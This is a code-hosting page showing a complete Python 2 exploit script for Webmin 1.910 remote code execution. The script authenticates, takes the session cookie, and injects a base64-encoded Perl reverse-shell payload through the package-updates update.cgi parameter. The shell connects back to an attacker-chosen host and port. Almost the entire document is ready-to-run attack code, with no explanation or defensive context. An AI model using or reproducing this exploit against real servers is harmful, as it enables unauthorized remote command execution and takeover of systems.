-
Notifications
You must be signed in to change notification settings - Fork 13
Expand file tree
/
Copy pathwebmin_exploit.py
More file actions
71 lines (62 loc) · 4.09 KB
/
webmin_exploit.py
File metadata and controls
71 lines (62 loc) · 4.09 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin/env python2
# -*- coding: utf8 -*-
import requests
import urllib3
urllib3.disable_warnings()
import argparse
import sys
from termcolor import colored
arg_parser = argparse.ArgumentParser(description='Webmin 1.910 - Remote Code Execution using, python script')
arg_parser.add_argument('--rhost', dest='rhost', help='Ip address of the webmin server', type=str, required=True)
arg_parser.add_argument("--rport", dest="rport", type=int, help="target webmin port, default 10000", default=10000)
arg_parser.add_argument('--lhost', dest='lhost', help='Local ip address to listen for the reverse shell', type=str, required=True)
arg_parser.add_argument("--lport", dest="lport", type=int, help="The Bind port for the reverse shell\n Default is 4444", default=4444)
arg_parser.add_argument('-u','--user', dest='user', help='The username to use for authentication\n By default is admin', default='admin', type=str)
arg_parser.add_argument('-p','--password', dest='password', help='The password to use for authentication', required=True, type=str)
arg_parser.add_argument('-t','--TARGETURI', dest='targeturi', help='Base path for Webmin application. By default set to "/"', default='/',type=str)
arg_parser.add_argument('-s','--SSL', dest='ssl', help='Negotiate SSL/TLS for outgoing connections. By default ssl is set to False', default='False',type=str)
args = arg_parser.parse_args()
# proxy set for test
proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}
# retrieve the Cookies sid:
print colored('****************************** Webmin 1.910 Exploit By roughiz*******************************', "blue")
print colored('*********************************************************************************************', "blue")
print colored('*********************************************************************************************', "blue")
print colored('*********************************************************************************************', "blue")
print colored('****************************** Retrieve Cookies sid *****************************************', "blue")
req={'page':'','user':args.user,'pass':args.password}
if args.ssl.lower() in ('yes', 'true', 't', 'y', '1'):
url="https://"+args.rhost+":"+str(args.rport)+args.targeturi
else:
url="http://"+args.rhost+":"+str(args.rport)+args.targeturi
resu=requests.post(url+"session_login.cgi",data=req, cookies={"testing":"1"}, verify=False, allow_redirects=False)
if "This web server is running in SSL mode" in resu.content:
print colored('********** [+] [Exploit][ERROR] Enable the ssl arg !!', "red")
print(resu.content)
sys.exit(1)
if "sid" in resu.headers['Set-Cookie']:
sid= resu.headers['Set-Cookie'].replace('\n', '').split('=')[1].split(";")[0].strip()
print("\n")
print colored('********** [+] [Exploit] The Cookie is '+sid, "green")
else:
print colored('********** [+] [Exploit][ERROR] The authentication to the webmin server failed', "red")
sys.exit(1)
print("")
print colored('********************************************************************************************', "blue")
print colored('****************************** Create payload and Exploit ***********************************', "blue")
print("\n")
# Templateofthe payload
template="perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\""+args.lhost+":"+str(args.lport)+"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
b64payload = template.encode('base64').replace('\n', '').strip()
payload=' | bash -c "{echo,'+b64payload+'}|{base64,-d}|{bash,-i}"'
## request the payload
req={'u':['acl/apt',payload]}
headers= {'Connection': 'close','referer': url+"package-updates/?xnavigation=1"}
try:
resu=requests.post(url+"package-updates/update.cgi",data=req, cookies={"sid":sid}, verify=False, allow_redirects=False, headers=headers, timeout=10)
except requests.Timeout:
pass
except requests.ConnectionError:
pass
print('\n')
print colored('********** [+] [Exploit] Verify you nc listener on port '+str(args.lport)+' for the incomming reverse shell', "green")